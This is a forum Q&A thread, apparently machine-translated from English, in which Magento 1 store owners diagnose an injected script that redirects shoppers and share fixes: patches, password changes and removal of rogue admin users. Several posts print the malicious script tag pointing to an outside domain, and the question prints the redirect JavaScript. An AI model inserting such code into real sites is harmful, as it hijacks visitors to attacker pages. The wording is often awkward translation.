网站开始重定向到另一个URL

9

Maybe it's infected by some virus.

我的网站开始重定向到这些受感染的URL。

http://mon.setsu.xyz
和一段时间https://tiphainemollard.us/index/?1371499155545
感染的链接

我要解决的问题。

  1. .htaccess文件已注释(什么都没有发生)
  2. 已评论包含文件夹(什么都没有发生)
  3. 扫描了完整的服务器(没有任何反应,没有发现病毒恶意软件)
  4. 更改了数据库中的CSS,媒体和js路径,只是为了确保其PHP或任何js都在做(没有任何反应)
  5. select * from core_config_data where path like '%secure%';所有链接都可以 更新

我用谷歌搜索,并写了许多文章,但他们认为这是浏览器问题或我的系统被感染了。 即使我在手机或个人笔记本电脑上打开网站,有关此问题的文章也一样。

更新2

我在数据库中找到了受影响的行。(正如鲍里斯·K(Boris K.)还说的)

core_config_datadesign/head/includes 值中有一个

<script src="<a href="https://melissatgmt.us/redirect_base/redirect.js">https://melissatgmt.us/redirect_base/redirect.js</a>" id="1371499155545"></script>

将在页面加载时将其插入头部。

如果您访问上述URL,您将获得重定向脚本,该脚本是 

   var redirChrome;
var isToChrome = document.currentScript.getAttribute('data-type');

if((isToChrome == 1 && navigator.userAgent.indexOf("Chrome") != -1) || !isToChrome){

 var idToRedirect = document.currentScript.getAttribute('id'); 

window.location.replace('https://tiphainemollard.us/index/?'+idToRedirect);
}

我删除该脚本后,客户网站从下午开始工作。 But the main problem is how that script inserted into the database.

一个补丁程序也已过时,因此我也更新了该补丁程序。

更新3 该站点再次被感染。这是插入到“管理”部分中的脚本(“ 管理”->“配置”->“常规”->“设计”->“ HTML头”->“其他脚本”管理员

并在数据库列中 数据库

我现在不知道该怎么办。当我更改每个密码时,删除了所有旧用户。

更新3

到现在为止该错误不会出现,因此,按照以上步骤操作,我们可以克服这个问题。

UPDATE :: 4 始终安装补丁程序,因为它可以帮助我在项目中减少对这类问题的存储,补丁程序也很重要。可以使用https://magescan.com/在其网站上检查问题。

magento-1  url  redirect 
因绍拉卜
source
在您的系统中可能会受到影响,请检查一下。检查您的浏览器。
拉玛·钱德兰M
@RamaChandran当我在google上搜索此URL时,几乎所有建议都是浏览器问题。我在我的手机中打开了网站,也遇到同样的问题。
inrsaurabh's
请提供您的网站网址
拉马赞德兰中号
1
我从design / head / includes中删除了<script src =“ <a href =” melissatgmt.us/redirect_base/redirect.js" > https://… >“ id =” 1371499155545“> </ script>。仍然没有用。当我访问我的网站后,该javascrip代码再次出现。你有什么想法吗?网站地址为hdvideodepot.com
标记
1
您可以添加magento版本标签吗?
sv3n

Answers:

6

我在core_config_data表中的下找到了注入的代码design/head/includes。删除它,现在站点恢复正常。

更新:正如其他所有人所说,今天早晨又发生了。这次,我可以从“管理面板”下的轻松删除它System > Configuration > General > Design > HTML Head > Miscellaneous Scripts。这是一个巨大的漏洞,我希望Magento正在开发一个补丁。

更新2:脚本又回来了,所以我更改了数据库密码,清除了缓存。大约一个小时后,脚本又回来了。所以我不认为它是通过数据库添加的。我刚刚更改了管理员密码,让我们看看是否再次出现。

更新3:由于我昨天在两个受影响的站点上都更改了管理员密码,因此大约24小时后,两个站点仍然干净。

鲍里斯·K
source
2
哇,这是一个巨大的安全漏洞,您知道造成了哪种漏洞吗?
Yehia A.Salam
3
在旧版本的Magento中一定是一个洞。我有一个基于Magento 2.1构建的网站,该网站没有受到影响,但是版本2以下的每个网站都已重定向。
Boris K.
这是一个巨大的安全问题。有谁知道代码是如何注入到表中的?在该表中,我们可以从管理区域向网站的页脚/页眉添加样式和javascript。黑客如何妥协呢?这是否意味着他们有权访问管理员?
花生
它在删除后一直返回,不确定该怎么做
Yehia A.Salam
我在系统>权限>用户上检测到恶意用户。删除它们(并先前修复了表core_config_data并更改了管理员的密码)之后,它似乎很稳定,但我想首先了解一下这种情况。洞/后门可能仍然存在,这是一个谜。
花生
3

同一问题在另一个magento网站上。我发现脚本已注入到页面的HEAD部分中,从melissatgmt.us(然后更改为另一个域)中请求redirect_base / redirect.js,但无法弄清楚该如何注入。

UPDATE:如其他人所述,在core_config_data表中找到了该条目并将其删除,但记录在下一页重新加载时返回。我更改了db密码,现在它似乎被击败了。我不确定密码更改是否是最终解决方案,但无论如何还是安全性的提高。

更新2:正如Jix Sas所述,与直接访问数据库表相比,在magento管理中从config访问更容易。但是狗屎会每隔10/15分钟返回一次。

更新3:更改管理员密码,检查并保存了一些cms页面(客户服务和about-us),这些页面似乎被某种方式感染了,禁用了缓存,多次清理了缓存(在每次检查并保存“被感染”的cms页面之后)在过去8个小时内注入了更多脚本。

ConsuLanza Informatica
source
是的,对,我得到了受影响的那一行。
inrsaurabh
请注意,可以访问magento管理员,没有问题,并且在Web日志中,我可以看到漫游器访问不受影响。我认为该恶意软件仅限于前端,并且会检查浏览器的用户代理。
ConsuLanza Informatica
那么您知道它是从哪里注入的吗?
Yehia A.Salam '17
是的,即使在从数据库中删除条目之后,我也可以确认它每10/15分钟就会回来
Yehia A.Salam
2

我更改了管理面板的路径app/etc/local.xml,这很有帮助。该脚本不再添加到中design/head/includes

说明:

在“ app/etc/local.xml我更改为<admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>以前”中 sitedomain.com/admin,现在管理面板的路径为 sitedomain.com/new_admin_path

紫杉属
source
抱歉,我没有告诉你你所做的事,请解释which path u chagned
inrsaurabh
在app / etc / local.xml中,我更改了 <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>以前的位置:sitedomain.com/admin,现在管理面板的路径为sitedomain.com/new_admin_path
Eugenia
好吧,我明白了您的建议
inrsaurabh
1

真是太好了,自早上以来,我已经恢复了十次网站。

错误不断出现。

什么是终极解决方案?

更改数据库密码?更改根密码?有补丁发布吗?

我不确定这是否相关,我是否从安全顾问那里收到了以下电子邮件

亲爱的先生或女士,

我们是Hatimeria,这是一家位于瑞士,波兰和荷兰的Magento开发公司。

最近,我们开始与新客户合作,并接管了他的旧服务器。在访问服务器的那一刻,我们偶然发现了一些恶意软件,黑客利用这些恶意软件可以接管客户端的服务器,并将其用作“黑客机器”来入侵其他网站。当然,客户不知道这是在他的服务器上发生的。

我们找到了通过该服务器被黑客入侵的您网站的数据库凭据。当然,我们不会对此做任何事情,但是我有义务与您联系并让您知道发生了什么。该黑客入侵是通过Magento Cacheleak漏洞完成的,该漏洞现在可能仍存在于您的商店中。

我建议您立即解决该漏洞,并更改数据库密码。我们的技术人员说,这大约需要30分钟。

在网站MageReport上,您可以看到您的网站还可能受到哪些攻击:https ://www.magereport.com/scan/?s =

这封电子邮件的主要目的不是吸引客户,但是如果您需要帮助确保商店安全或有任何其他疑问,我们很乐意为您提供帮助。

此致,托马斯·坦纳(Thomas Tanner)

所以我猜解决方案是更改数据库密码

莫希特·哈特里(Mohit Khatri)
source
1

我们需要了解造成此类垃圾邮件注入的主要原因

如果您的网站被注入,请在所有三项恶意软件扫描中检查您的网站

https://magescan.com

https://www.magereport.com

https://sitecheck.sucuri.net/

我感觉这是由于缺少安全补丁!如果您发现缺少补丁,请在此主题下进行报告

  1. 更改主机访问密码更改数据库密码更改管理员登录密码 HIDE ADMIN AND DOWNLOAD URLs并在公共视图下隐藏/ RSS /。

  2. 进行完整站点病毒扫描,如果您自己不能进行托管,托管服务提供商将能够扫描该站点。

  3. 转到系统->用户,查看帐户中是否有任何未经授权的注册用户。

图标
source
0

我解决了这个问题。即使我<script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script>core_config_data表中删除了fhis文件的design/head/includes价值。它没有解决问题。脚本代码一次又一次插入。要解决此问题,只需遵循以下三个步骤。

  1. 从中的core_config_data表中删除脚本代码design/head/includes
  2. 更改数据库密码(包括app/etc/local.xml凭据)。
  3. 使用此命令清除根Magento文件夹中的缓存 rm -rf var/cache/*

ps我整天都呆了。希望这对您有用。并确保始终备份文件。

标记
source
0

就在今天,我也发生了同样的事情!重定向到同一网站。但是,我在Magento管理面板中的configuration> design> html head> misc脚本下找到了该脚本。那里有这个脚本:<script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script> 我从那里删除了它,网站运行正常。我没有您说过的文件夹,您在其中找到了脚本。您知道它在哪里吗?(您知道HTML head> misc脚本的路径)

还有,你最近做什么?也许我们可以找出原因?对我来说,我安装了一个免费的新闻通讯弹出窗口,这可能是原因。你呢?

更新:现在脚本又回来了。有人告诉我如何从数据库访问此脚本以将其删除?

更新2:如Mark所述,删除脚本并更改数据库密码阻止了该脚本的返回。如果有人知道此漏洞的名称,或者有危险向客户付款,请告知我们。

جيلبير
source
By using our site, you acknowledge that you have read and understand our Cookie Policy and Privacy Policy.
Licensed under cc by-sa 3.0 with attribution required.